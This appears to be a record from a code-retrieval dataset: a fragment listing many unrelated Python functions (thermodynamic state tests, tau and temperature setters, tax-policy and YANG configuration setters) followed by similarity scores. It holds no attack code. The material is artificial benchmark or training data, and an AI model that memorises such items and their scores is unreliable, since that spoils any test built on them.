np.isclose(s.cv, Q_(1509.1482452129906, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(1.801983936953226, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(2730301.3859201893, \"J/kg\")) # type: ignore\n assert s.x is None", "def get_tau_gap(vals,tau): \n ans = 0.0\n m = 0.0\n N = len(vals)\n for i in range(N):\n ai = 2.0*vals[i]-1\n if ai > 0:\n m += 1\n tmp = 0.0\n if tau >= 0: # votes close to 50% are weighed more (\"traditional\")\n if ai >= 0: \n tmp = pow(ai,tau+1)\n else:\n tmp = -pow(-ai,tau+1)\n else: # votes close to 50% are weighed less \n if ai >= 0:\n tmp = pow((1-ai),-tau+1)\n else:\n tmp = -pow((1+ai),-tau+1)\n ans += tmp\n \n if tau >= 0:\n return 2.0*(ans/N + 0.5 - m/N)\n else:\n return -2.0*(ans/N + 0.5 - m/N)", "def _set_minimum(self, time):\n if time > self._maximum:\n self._maximum = time\n self._minimum = time", "def set_tax_system(self, tauv):\n \n mtau=np.ones((self.Ns,1))*tauv\n \n if self.policy_type == 1 : #only output tax\n self.tau_output = mtau \n self.tau_capital = np.zeros((self.Ns, self.ntau))\n self.tau_labor = np.zeros((self.Ns, self.ntau))\n \n elif self.policy_type == 2: 
#only capital tax\n self.tau_output = np.zeros((self.Ns, self.ntau)) \n self.tau_capital = mtau\n self.tau_labor = np.zeros((self.Ns, self.ntau))\n \n else : #only labor tax\n self.tau_output = np.zeros((self.Ns, self.ntau)) \n self.tau_capital = np.zeros((self.Ns, self.ntau)) \n self.tau_labor = mtau", "def set_initial(self, value):\n # TODO: Make an Initial Stock Adjust here\n pass", "async def update_trade_minimums(self):\n\n trade_base_btc_pair = '{}-BTC'.format(config['trade_base'])\n\n if config['trade_base'] != 'BTC':\n trade_base_rate = self.base_rates[trade_base_btc_pair]\n else:\n trade_base_rate = 1.0\n\n base_mult = await self.get_pair_base_mult(config['trade_base'], trade_base_btc_pair)\n self.min_trade_size = trade_base_rate * config['trade_min_size_btc'] * base_mult\n self.min_safe_trade_size = self.min_trade_size * (1.0 + config['trade_min_safe_percent'])", "def _gammaParameter(self, t : float, dtau : float) -> float:\n pass", "def force_to_input_unit(self, force_val: float):\n pass", "def tau_ruptura( largo_falla, beta = 2500 ):\n\n # se chequean unidades de medida de beta, tiene que estar en metros/s, no km/s\n if beta < 1000:\n beta = beta * 1000\n else: \n beta = beta\n\n tau = largo_falla/( 0.8 * beta )\n\n return tau", "def set_temps_prepa(self, tp: int):\n self.temps_prepa = tp", "def set_tau_profile(self, function, side='both', min=0.0, max=None):\n if side.lower() == 'both':\n self.tau_f = np.clip(function(self.r_disk_f), a_min=min, a_max=max)\n self.tau_b = np.clip(function(self.r_disk_b), a_min=min, a_max=max)\n elif side.lower() == 'front':\n self.tau_f = np.clip(function(self.r_disk_f), a_min=min, a_max=max)\n elif side.lower() == 'back':\n self.tau_b = np.clip(function(self.r_disk_b), a_min=min, a_max=max)\n else:\n raise ValueError(\"`side` must be 'front', 'back' or 'both'.\")", "def test_set_Tp(self):\n s = State(substance=\"water\")\n s.Tp = Q_(400.0, \"K\"), Q_(101325.0, \"Pa\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.Tp[0], Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.Tp[1], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.u, Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(7496.2021523754065, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cp, Q_(2009.2902478486988, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cv, Q_(1509.1482452129906, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(1.801983936953226, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(2730301.3859201893, \"J/kg\")) # type: ignore\n assert s.x is None\n assert s.phase == \"gas\"", "def set_initial_value(self, t, x):\n\n self.integrator.set_initial_value(x, t).set_f_params(self._params[\"args\"])\n try:\n testoutput = self.rhs(t, x, self.args)\n except:\n print(\"ODE function not callable\")\n raise\n\n super().set_initial_value(t, x)", "def cool(self):\n self.t = self.t - 1", "def tau_RC(run = 0):\n\n\n tau = {}\n \n tau[0] = { 0 : 0.000528448223727 ,\n 1 : 0.000534286124735 ,\n 2 : 0.000531127097197 ,\n 3 : 0.000528590936727 ,\n 4 : 0.000523307118588 ,\n 5 : 0.000531484578773 ,\n 6 : 0.000522540813269 ,\n 7 : 0.000529130885772 ,\n 8 : 0.000527471895065 ,\n 9 : 0.000527267947332 ,\n 10 : 0.000529931735586 ,\n 11 : 0.000527613470536 }\n \n \n tau[8088] = { 0 : 5.31332e-04 ,\n 1 : 5.36915e-04 ,\n 2 : 5.32637e-04 ,\n 3 : 5.30414e-04 ,\n 4 : 5.32376e-04 ,\n 5 : 5.42936e-04 
,\n 6 : 5.30456e-04 ,\n 7 : 5.39265e-04 ,\n 8 : 5.29270e-04 ,\n 9 : 0.000529219 ,\n 10 : 5.29847e-04 ,\n 11 : 5.28952e-04 }\n \n tau[8089] = { 0 : 5.31416e-04 ,\n 1 : 5.37008e-04 ,\n 2 : 5.33042e-04 ,\n 3 : 0.000530479 ,\n 4 : 5.32518e-04 ,\n 5 : 5.42983e-04 ,\n 6 : 5.30310e-04 ,\n 7 : 5.39168e-04 ,\n 8 : 0.000529401 ,\n 9 : 0.000529229 ,\n 10 : 0.000530108 , \n 11 : 0.000529216 }\n \n \n tau[8678] = { 0 : 5.31343e-04 ,\n 1 : 5.36915e-04 ,\n 2 : 5.32922e-04 ,\n 3 : 0.000530248 ,\n 4 : 0.000532365 ,\n 5 : 0.000542388 ,\n 6 : 0.000530768 ,\n 7 : 0.000539662 ,\n 8 : 0.000529246 ,\n 9 : 0.00052921 ,\n 10 : 0.000529816 ,\n 11 : 0.000529137 }\n\n if run not in tau:\n print (' tau_RC, requested run ', run , ' not available, default used')\n run = 0 \n \n return tau[run]", "def tau(self,x,n=50):\n sigma = np.zeros(n,dtype=np.int8)\n for k in range(n):\n if x<=self.rho:\n sigma[k] = 0\n x = self.f0(x)\n else:\n sigma[k] = 1\n x = self.f1(x)\n return sigma", "def _set_ks_static(self, ks):\n self.ks = ks\n if np.max(self.ks) > self._kret:\n self._kret = np.max(self.ks)", "def min_temp(self):\n if self._min_temp:\n return self._min_temp\n\n # get default temp from super class\n return super().min_temp", "def setTolerance(self, eps):\n self._simulator_.update(eps=eps)\n return", "def __init__(self):\n super().__init__()\n self.TERRAIN_VARIANCE = 0.0", "def setTCLimits(*args):\n args[0].Limit.TCLimit.tc_limit = args[1]", "def test_temperatures_value(self):\n self.assertEqual(self.TminValue, 450.0)", "def set_temperature(self, iteration):\n if self.annealing is False:\n self.annealing_temp = 1.0\n return\n\n if iteration < self.sample_size * 0.2:\n self.annealing_temp = 0.2\n elif iteration < self.sample_size * 0.3:\n self.annealing_temp = 0.4\n elif iteration < self.sample_size * 0.4:\n self.annealing_temp = 0.6\n elif iteration < self.sample_size * 0.5:\n self.annealing_temp = 0.8\n else:\n self.annealing_temp = 1.0", "def setValue(self, value):\r\n # Clamp values to [0,1]\r\n self.__value = max(0, min(value, 1))", "def SetTol(self, tol):\n return _hypre.HypreBoomerAMG_SetTol(self, tol)", "def set_time(self, value: float):\n if value < 0:\n value = 0\n\n self.controller.row = self.rps * value", "def set_temporal_adapted_epsilon(self):\n\t\t\n\t\t# Perfectly adapted activity level is based on the variables:\n\t\t# temporal_adaptation_mu_eps, temporal_adaptation_sigma_eps, \n\t\t# temporal_adaptation_mu_Ss0. 
These functions take the activity\n\t\t# level set by these variables at that signal intensity, to \n\t\t# adapt epsilon to the current Ss\n\t\tperfect_adapt_eps_base = sp.ones(self.Mm)*\\\n\t\t\t\tself.temporal_adaptation_mu_eps + random_matrix(self.Mm, \n\t\t\t\tparams=[0, self.temporal_adaptation_sigma_eps], \n\t\t\t\tseed=self.seed_eps)\n\t\tperfect_adapt_Ss = sp.zeros(self.Nn)\n\t\tperfect_adapt_Ss[self.Ss0 != 0] = self.temporal_adaptation_mu_Ss0\n\t\tperfect_adapt_Yy = receptor_activity(perfect_adapt_Ss, \n\t\t\t\t\t\t\t\tself.Kk1, self.Kk2, perfect_adapt_eps_base)\n\t\t\n\t\t# Make adaptation rate into a vector if it has not yet been set.\n\t\ttry:\n\t\t\tself.temporal_adaptation_rate_vector\n\t\texcept AttributeError:\n\t\t\tassert self.temporal_adaptation_rate_sigma == 0, \"Before \"\\\n\t\t\t\t\"setting new epsilon with set_temporal_adapted_epsilon, \"\\\n\t\t\t\t\"you must call set_ordered_temporal_adaptation_rate, since \"\\\n\t\t\t\t\"temporal_adaptation_rate_sigma is nonzero\"\n\t\t\tself.temporal_adaptation_rate_vector = sp.ones(self.Mm)*\\\n\t\t\t\tself.temporal_adaptation_rate\n\t\t\n\t\tif self.temporal_adaptation_type == 'imperfect':\n\t\t\td_eps_dt = self.temporal_adaptation_rate_vector*\\\n\t\t\t\t\t\t(self.Yy - perfect_adapt_Yy)\n\t\t\tdelta_t = self.signal_trace_Tt[1] - self.signal_trace_Tt[0]\n\t\t\tself.eps += delta_t*d_eps_dt \n\t\telif self.temporal_adaptation_type == 'perfect':\n\t\t\tself.eps = free_energy(self.Ss, self.Kk1, self.Kk2, \n\t\t\t\t\t\t\t\t\tperfect_adapt_Yy)", "def testImplicitMinValue(self):\n orig_scale = util.ScaleData\n util.ScaleData = self.FakeScale\n try:\n self.AddToChart(self.chart, [0, 10])\n self.chart.auto_scale.buffer = 0\n self.chart.display.Url(0, 0) # This causes a call to FakeScale.\n self.assertEqual(0, self.min)\n self.chart.left.min = -5\n self.chart.display.Url(0, 0) # This causes a call to FakeScale.\n self.assertEqual(-5, self.min)\n finally:\n util.ScaleData = orig_scale", "def min_auto(self) -> 'Size':\n self.minimum = 'auto'\n return self", "def auto(self):\n self.set_thermostat = 1 if self.desired_values[0] > self.data[0] else 0\n self.set_humidifier = 1 if self.desired_values[1] > self.data[1] else 0\n self.set_sprinklers = 1 if self.desired_values[2] > self.data[2] else 0\n self.set_ventilation = 1 if (self.desired_values[3] > self.data[3] or self.desired_values[4] < self.data[4]) else 0", "def _set_min_tx_interval(self, v, load=False):\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"min-tx-interval\", rest_name=\"min-tx-interval\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"min_tx_interval must be of a type compatible with uint32\"\"\",\n 'defined-type': \"uint32\",\n 'generated-type': \"\"\"YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"min-tx-interval\", rest_name=\"min-tx-interval\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\"\"\",\n })\n\n self.__min_tx_interval = 
t\n if hasattr(self, '_set'):\n self._set()", "def setTs(self, Ts):\r\n\t\tself.Ts = Ts\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def setTs(self, Ts):\r\n\t\tself.Ts = Ts\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def check_global_minima(self,value, t, index): \n if value < self._global_minima_value: # If the value is smaller we have a new minima\n self._global_minima_value = value \n elif value == self._global_minima_value: # If value is equal we're at a new minima pos\n if self._global_minima_t is not None and self._periodicity is None: # If periodicity is None then we need to set it\n self._periodicity = t-self._global_minima_t\n else: \n if self._index_of_first_minima is None:\n self._index_of_first_minima = index-1 # minus 1 bcs we have started to increase again.\n self._global_minima_t = t-self._step_size", "def reset(self):\n self.epsilon = self.start", "def tau_calculation(self, det, gt):\n return np.round((self.area_of_intersection(det, gt) / self.area(det)), 2)", "def init_tau(k, p, q): # whereas k = k + 4\n tau_matrix = np.zeros((k, k))\n for row in range(2, k - 2):\n tau_matrix[row][row + 1] = 1\n tau_matrix[0][1] = q\n tau_matrix[0][k - 2] = 1 - q\n tau_matrix[1][1] = 1 - p\n tau_matrix[1][2] = p\n tau_matrix[k - 2][k - 2] = 1 - p\n tau_matrix[k - 2][k - 1] = p\n tau_matrix[-1][-1] = 1\n tau_matrix = mf.log_marix(tau_matrix)\n return tau_matrix", "def setTmax(t, verbose=True):\n if t == None:\n s.setScriptDouble(odi.INDX_DBL_TMAX,0.0)\n s.setScriptBool(odi.INDX_BOOL_TMAX,False)\n if verbose:\n trackMessage('Unsetting maximum track length')\n else:\n s.setScriptDouble(odi.INDX_DBL_TMAX,helpers.convertHms(t))\n s.setScriptBool(odi.INDX_BOOL_TMAX,True)\n if verbose:\n trackMessage('Setting maximum track length to '+str(t)+ ' hours')", "def tauPoint(numDeps, tauRos, tau):\r\n\r\n #int index;\r\n\r\n help = [0.0 for i in range(numDeps)]\r\n\r\n for i in range(0, numDeps):\r\n\r\n help[i] = tauRos[0][i] - tau\r\n help[i] = abs(help[i])\r\n\r\n \r\n index = 0\r\n min = help[index]\r\n\r\n for i in range(1, numDeps):\r\n\r\n if (help[i] < min): \r\n min = help[i]\r\n index = i\r\n \r\n\r\n return index", "def adjust_k(self, ):\n self.iteration += 1\n\n if self.max_violation:\n self.k = 1\n return 1.\n\n self.k = (1.-self.beta**np.float(self.iteration))\n return self.k", "def adjust_k(self, ):\n self.iteration += 1\n\n if self.max_violation:\n self.k = 1\n return 1.\n\n self.k = (1.-self.beta**np.float(self.iteration))\n return self.k", "def rmin(self) -> float:\n return self.options.rmin", "def set_T(self, T):\n self.T = T", "def T_i(self, value: u.K):\n if value is None:\n self._T_i = np.repeat(self._T_e, self._number_of_particles)\n return\n\n if value.size == 1:\n self._T_i = np.repeat(value, self._number_of_particles)\n elif value.size == self._number_of_particles:\n self._T_i = value\n else:\n error_str = (\n \"T_i must be set with either one common temperature\"\n f\" for all ions, or a set of {self._number_of_particles} of them. 
\"\n )\n\n if value.size == 5 and self._number_of_particles != 5:\n error_str += f\" For {self.base_particle}, five is right out.\"\n raise ParticleError(error_str)", "def min_value(self, min_value):\n\n self._min_value = min_value", "def min_value(self, min_value):\n\n self._min_value = min_value", "def min_value(self, min_value):\n\n self._min_value = min_value", "def set_min_time(self, time):\n self.widget().setMinimumTime(time)", "def loadVal(self, newVal):\n if not newVal:\n self.size = self.defaultVal\n self.specified = False\n return\n try:\n self.size = float(newVal)\n except ValueError:\n self.size = self.defaultVal\n if self.size < LOWER_LIMIT or self.size > UPPER_LIMIT:\n self.size = self.defaultVal\n self.specified = True", "def SetTol(self, tol):\n return _hypre.HyprePCG_SetTol(self, tol)", "def max_temp(self):\n return 99", "def _set_minimum_value(self, value):\n # Check if the current value is not None, and if so, throw an error\n # because this property should not be set twice\n if self._get_minimum_value() is not None:\n raise RuntimeError('maximum value should not be set twice')\n\n # If the value is None, ignore it\n if value is None:\n return\n\n # Set the value\n self._minimum_value = value", "def nt(self, val):\n if isinstance(val, int):\n if val != self._faux._nt:\n self._faux._nt = val\n self._faux._update()\n else:\n warn(\"`val` not valid, no update performed\")", "def initialise_target(self, c, key):\n if key == 'p':\n return 1e5\n elif key == 'h':\n if self.Q.val < 0 and self.Q.is_set:\n return 5e5\n elif self.Q.val > 0 and self.Q.is_set:\n return 1e5\n else:\n return 3e5", "def setUp(self):\n self.t = True\n self.f = False\n self.value = 25", "def initial(self):\n return zero", "def fill_with_neg_inf(t):\r\n return t.float().fill_(float(\"-inf\")).type_as(t)", "def set_min_position(self, min_us):\n raise NotImplementedError()", "def weight_expr_ahead(self, t, tau, w_plus, z, value):\n return self.weight_expr(t, w_plus, z, value)", "def tau_plus(self,x,n=50):\n sigma = np.zeros(n,dtype=np.int8)\n for k in range(n):\n if x>=self.rho:\n sigma[k] = 1\n x = self.f1(x)\n else:\n sigma[k] = 0\n x = self.f0(x)\n return sigma", "def set_temperature(self):\n self.temperature = self.gui.doubleSpinBox_temperature.value()\n self.logger.debug('Changing the temperature to {}K'.format(self.temperature))\n\n self.anc350_instrument.temperature = self.temperature\n self.anc350_instrument.set_temperature_limits()\n\n self.max_dclevel_V = self.anc350_instrument.max_dC_level\n\n self.logger.debug('Changed the scanner piezo limits to {}'.format(self.max_dclevel_V))", "def _adapt_time(self):\n self.time = min(max(self.time, self.minimum), self.maximum)", "def SetTol(self, tol):\n return _hypre.HypreAME_SetTol(self, tol)", "def set_xmin(self, xmin):\n self.__xmin = xmin", "def update_temperature(self):\n self.iteration += 1 \n self.T = self.T0 * 0.9935**self.iteration", "def tau_plus_minus(self):\n ct = self.cartan_type()\n L,R = ct.index_set_bipartition()\n return self.tau_epsilon_operator_on_almost_positive_roots(L), self.tau_epsilon_operator_on_almost_positive_roots(R)", "def adjust_u(self):\r\n # compute the volume integrals of the x,y, and z components of u\r\n ux = assemble(self.u.sub(0)*dx)\r\n uy = assemble(self.u.sub(1)*dx)\r\n uz = assemble(self.u.sub(2)*dx)\r\n\r\n # create a function of value 1, which can be integrated.\r\n try:\r\n self.unit\r\n except AttributeError:\r\n self.unit = Function(self.Q)\r\n self.unit.assign(Constant(1))\r\n\r\n # compute the volume of the 
body\r\n Vol = assemble(self.unit*dx)\r\n\r\n try:\r\n self.umean\r\n except AttributeError:\r\n self.umean = Function(self.Z)\r\n\r\n # compute the volume-averaged component means\r\n self.umean.assign(Constant((ux/Vol, uy/Vol, uz/Vol, 0)))\r\n\r\n # subtract the mean from the solution function\r\n self.up.assign(self.up-self.umean)", "def set_temps_cuisson(self, tc: int):\n self.temps_cuisson = tc", "def set_capacity(self, cap):\n self._capacity.type = 'value'\n self._capacity._value = float(cap) # TODO getter/setter", "def test_set_Tu(self):\n s = State(substance=\"water\")\n s.Tu = Q_(400.0, \"K\"), Q_(2547715.3635084038, \"J/kg\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.Tu[0], Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.Tu[1], Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.u, Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(7496.2021523754065, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cp, Q_(2009.2902478486988, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cv, Q_(1509.1482452129906, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(1.801983936953226, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(2730301.3859201893, \"J/kg\")) # type: ignore\n assert s.x is None" ]
[ "0.64921534", "0.61496323", "0.61187613", "0.6012751", "0.59901506", "0.58402216", "0.5835517", "0.56944895", "0.5693752", "0.5693752", "0.5661594", "0.55744827", "0.55099267", "0.5492436", "0.5492436", "0.54596823", "0.5449228", "0.5433668", "0.54214495", "0.54214495", "0.5411966", "0.5409943", "0.5402922", "0.5362139", "0.5313241", "0.53024226", "0.5297017", "0.5284732", "0.52641743", "0.52622175", "0.5248869", "0.5234751", "0.52324486", "0.5232044", "0.52046776", "0.51834524", "0.5160402", "0.5136518", "0.51357466", "0.5133935", "0.51316875", "0.51275766", "0.5125277", "0.5120953", "0.5113571", "0.5102178", "0.50996375", "0.50928557", "0.5080456", "0.5066488", "0.5061649", "0.50611925", "0.5041635", "0.5038951", "0.50351113", "0.50327563", "0.5032352", "0.5022545", "0.50163287", "0.5012658", "0.5001383", "0.49958864", "0.49958864", "0.49858662", "0.4985215", "0.49784264", "0.49761015", "0.49739185", "0.49665332", "0.49485356", "0.49485356", "0.4944633", "0.4936339", "0.49338433", "0.4926408", "0.4926408", "0.4926408", "0.49204803", "0.49117327", "0.4902303", "0.49000016", "0.48974577", "0.48954827", "0.48907635", "0.48905376", "0.4889493", "0.48754337", "0.4871019", "0.48709977", "0.48693416", "0.48661268", "0.4859721", "0.48541436", "0.48484203", "0.4845611", "0.48389095", "0.48381764", "0.483594", "0.48327437", "0.48325035" ]
0.60347635
3
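The tau setter is the meta-GGA counterpart of the sigma setter shown earlier, with the same non-negativity guard. A short sketch under the same assumption that the class is pylibxc.LibXCFunctional; the meta-GGA functional name is an illustrative choice, since tau only enters meta-GGA evaluations:

# Hedged sketch: assumes pylibxc is installed.
import pylibxc

mgga = pylibxc.LibXCFunctional("mgga_x_tpss", "unpolarized")
mgga.set_tau_threshold(1.0e-20)          # non-negative values are accepted
# mgga.set_tau_threshold(-1.0)           # would raise ValueError, mirroring the guard above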
Evaluates the functional and its derivatives on a grid.
def compute(self, inp, output=None, do_exc=True, do_vxc=True, do_fxc=False, do_kxc=False, do_lxc=False):

    # Check flags
    if not self._have_exc and do_exc:
        raise ValueError("Functional '%s' does not have EXC capabilities." % self.get_name())
    if not self._have_vxc and do_vxc:
        raise ValueError("Functional '%s' does not have VXC capabilities built in." % self.get_name())
    if not self._have_fxc and do_fxc:
        raise ValueError("Functional '%s' does not have FXC capabilities built in." % self.get_name())
    if not self._have_kxc and do_kxc:
        raise ValueError("Functional '%s' does not have KXC capabilities built in." % self.get_name())
    if not self._have_lxc and do_lxc:
        raise ValueError("Functional '%s' does not have LXC capabilities built in." % self.get_name())

    # Parse input arrays
    if isinstance(inp, np.ndarray):
        inp = {"rho": np.asarray(inp, dtype=np.double)}
    elif isinstance(inp, dict):
        inp = {k: np.asarray(v, dtype=np.double) for k, v in inp.items()}
    else:
        raise KeyError("Input must have a 'rho' variable or a single array.")

    # How long are we?
    npoints = int(inp["rho"].size / self._spin)
    if (inp["rho"].size % self._spin):
        raise ValueError("Rho input has an invalid shape, must be divisible by %d" % self._spin)

    # Find the right compute function
    args = [self.xc_func, ctypes.c_size_t(npoints)]
    if self.get_family() in [flags.XC_FAMILY_LDA, flags.XC_FAMILY_HYB_LDA]:
        input_labels = ["rho"]
        input_num_args = 1

        output_labels = [
            "zk",      # 1, 1
            "vrho",    # 1, 2
            "v2rho2",  # 1, 3
            "v3rho3",  # 1, 4
            "v4rho4"   # 1, 5
        ]

        # Build input args
        output = _check_arrays(output, output_labels[0:1], self.xc_func_sizes, npoints, do_exc)
        output = _check_arrays(output, output_labels[1:2], self.xc_func_sizes, npoints, do_vxc)
        output = _check_arrays(output, output_labels[2:3], self.xc_func_sizes, npoints, do_fxc)
        output = _check_arrays(output, output_labels[3:4], self.xc_func_sizes, npoints, do_kxc)
        output = _check_arrays(output, output_labels[4:5], self.xc_func_sizes, npoints, do_lxc)

        args.extend([inp[x] for x in input_labels])
        args.extend([output[x] for x in output_labels])

        core.xc_lda(*args)

    elif self.get_family() in [flags.XC_FAMILY_GGA, flags.XC_FAMILY_HYB_GGA]:
        input_labels = ["rho", "sigma"]
        input_num_args = 2

        output_labels = [
            "zk",                                                                 # 1, 1
            "vrho", "vsigma",                                                     # 2, 3
            "v2rho2", "v2rhosigma", "v2sigma2",                                   # 3, 6
            "v3rho3", "v3rho2sigma", "v3rhosigma2", "v3sigma3",                   # 4, 10
            "v4rho4", "v4rho3sigma", "v4rho2sigma2", "v4rhosigma3", "v4sigma4"    # 5, 15
        ]

        # Build input args
        output = _check_arrays(output, output_labels[0:1], self.xc_func_sizes, npoints, do_exc)
        output = _check_arrays(output, output_labels[1:3], self.xc_func_sizes, npoints, do_vxc)
        output = _check_arrays(output, output_labels[3:6], self.xc_func_sizes, npoints, do_fxc)
        output = _check_arrays(output, output_labels[6:10], self.xc_func_sizes, npoints, do_kxc)
        output = _check_arrays(output, output_labels[10:15], self.xc_func_sizes, npoints, do_lxc)

        args.extend([inp[x] for x in input_labels])
        args.extend([output[x] for x in output_labels])

        core.xc_gga(*args)

    elif self.get_family() in [flags.XC_FAMILY_MGGA, flags.XC_FAMILY_HYB_MGGA]:

        # Build input args
        if self._needs_laplacian:
            input_labels = ["rho", "sigma", "lapl", "tau"]
        else:
            input_labels = ["rho", "sigma", "tau"]
        input_num_args = 4

        output_labels = [
            "zk",                                                                        # 1, 1
            "vrho", "vsigma", "vlapl", "vtau",                                           # 4, 5
            "v2rho2", "v2rhosigma", "v2rholapl", "v2rhotau", "v2sigma2",                 # 10, 15
            "v2sigmalapl", "v2sigmatau", "v2lapl2", "v2lapltau", "v2tau2",
            "v3rho3", "v3rho2sigma", "v3rho2lapl", "v3rho2tau", "v3rhosigma2",           # 20, 35
            "v3rhosigmalapl", "v3rhosigmatau", "v3rholapl2", "v3rholapltau", "v3rhotau2",
            "v3sigma3", "v3sigma2lapl", "v3sigma2tau", "v3sigmalapl2", "v3sigmalapltau",
            "v3sigmatau2", "v3lapl3", "v3lapl2tau", "v3lapltau2", "v3tau3",
            "v4rho4", "v4rho3sigma", "v4rho3lapl", "v4rho3tau", "v4rho2sigma2",          # 35, 70
            "v4rho2sigmalapl", "v4rho2sigmatau", "v4rho2lapl2", "v4rho2lapltau", "v4rho2tau2",
            "v4rhosigma3", "v4rhosigma2lapl", "v4rhosigma2tau", "v4rhosigmalapl2", "v4rhosigmalapltau",
            "v4rhosigmatau2", "v4rholapl3", "v4rholapl2tau", "v4rholapltau2", "v4rhotau3",
            "v4sigma4", "v4sigma3lapl", "v4sigma3tau", "v4sigma2lapl2", "v4sigma2lapltau",
            "v4sigma2tau2", "v4sigmalapl3", "v4sigmalapl2tau", "v4sigmalapltau2", "v4sigmatau3",
            "v4lapl4", "v4lapl3tau", "v4lapl2tau2", "v4lapltau3", "v4tau4"
        ]

        # Build input args
        output = _check_arrays(output, output_labels[0:1], self.xc_func_sizes, npoints, do_exc)
        output = _check_arrays(output, output_labels[1:5], self.xc_func_sizes, npoints, do_vxc)
        output = _check_arrays(output, output_labels[5:15], self.xc_func_sizes, npoints, do_fxc)
        output = _check_arrays(output, output_labels[15:35], self.xc_func_sizes, npoints, do_kxc)
        output = _check_arrays(output, output_labels[35:70], self.xc_func_sizes, npoints, do_lxc)

        args.extend([inp[x] for x in input_labels])
        if not self._needs_laplacian:
            args.insert(-1, np.empty((1)))  # Add none ptr to laplacian
        args.extend([output[x] for x in output_labels])

        core.xc_mgga(*args)

    else:
        raise KeyError("Functional kind not recognized! (%d)" % self.get_kind())

    return {k: v for k, v in zip(output_labels, args[2 + input_num_args:]) if not v is None}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def grid_eval(self, gridaxes):\n assert len(gridaxes) == self.sdim, \"Input has wrong dimension\"\n # make sure axes are one-dimensional\n if not all(np.ndim(ax) == 1 for ax in gridaxes):\n gridaxes = tuple(np.squeeze(ax) for ax in gridaxes)\n assert all(ax.ndim == 1 for ax in gridaxes), \\\n \"Grid axes should be one-dimensional\"\n colloc = [collocation(self.kvs[i], gridaxes[i]) for i in range(self.sdim)]\n return apply_tprod(colloc, self.coeffs)", "def test_multiple_expvals_grad(self, execute_kwargs):\n dev = qml.device(\"default.qubit\", wires=2)\n params = jax.numpy.array([0.1, 0.2, 0.3])\n\n def cost(a, cache):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(a[0], wires=0)\n qml.RX(a[1], wires=0)\n qml.RY(a[2], wires=0)\n qml.expval(qml.PauliZ(0))\n qml.expval(qml.PauliZ(1))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n res = qml.interfaces.execute([tape], dev, cache=cache, **execute_kwargs)[0]\n return res[0] + res[1]\n\n res = jax.jit(jax.grad(cost), static_argnums=1)(params, cache=None)\n assert res.shape == (3,)", "def evaluate_df(self, df):\n ## Check invariant; model inputs must be subset of df columns\n var_diff = set(self.var).difference(set(df.columns))\n if len(var_diff) != 0:\n raise ValueError(\n \"Model inputs not a subset of given columns;\\n\"\n + \"missing var = {}\".format(var_diff)\n )\n\n df_tmp = df.copy().drop(self.out, axis=1, errors=\"ignore\")\n ## Evaluate each function\n for func in self.functions:\n ## Concatenate to make intermediate results available\n df_tmp = concat((df_tmp, func.eval(df_tmp)), axis=1)\n\n return df_tmp[self.out]", "def evaluate(\n self, nodes, derivatives=np.array([0, 0, 0]), modes=None, unique=False\n ):", "def _evalAndDer(self, x):\n m = len(x)\n fx = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n fx[:, j] = self.functions[j](x)\n i = self.argcompare(fx, axis=1)\n y = fx[np.arange(m), i]\n dydx = np.zeros_like(y)\n for j in range(self.funcCount):\n c = i == j\n dydx[c] = self.functions[j].derivative(x[c])\n return y, dydx", "def _evalAndDer(self, x):\n m = len(x)\n fx = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n fx[:, j] = self.functions[j](x)\n i = self.argcompare(fx, axis=1)\n y = fx[np.arange(m), i]\n dydx = np.zeros_like(y)\n for j in range(self.funcCount):\n c = i == j\n dydx[c] = self.functions[j].derivative(x[c])\n return y, dydx", "def _evaluate_gradient(self, **variables):\n pass", "def eval_func_on_grid(f, re, im, N):\n l = re[1] - re[0]\n h = im[1] - im[0]\n resL = N*l #horizontal resolution\n resH = N*h #vertical resolution\n x = np.linspace(re[0], re[1],resL)\n y = np.linspace(im[0], im[1], resH)\n x, y = np.meshgrid(x,y)\n z = x + 1j*y\n w = f(z)\n return w", "def evaluate(params, grid):\n return 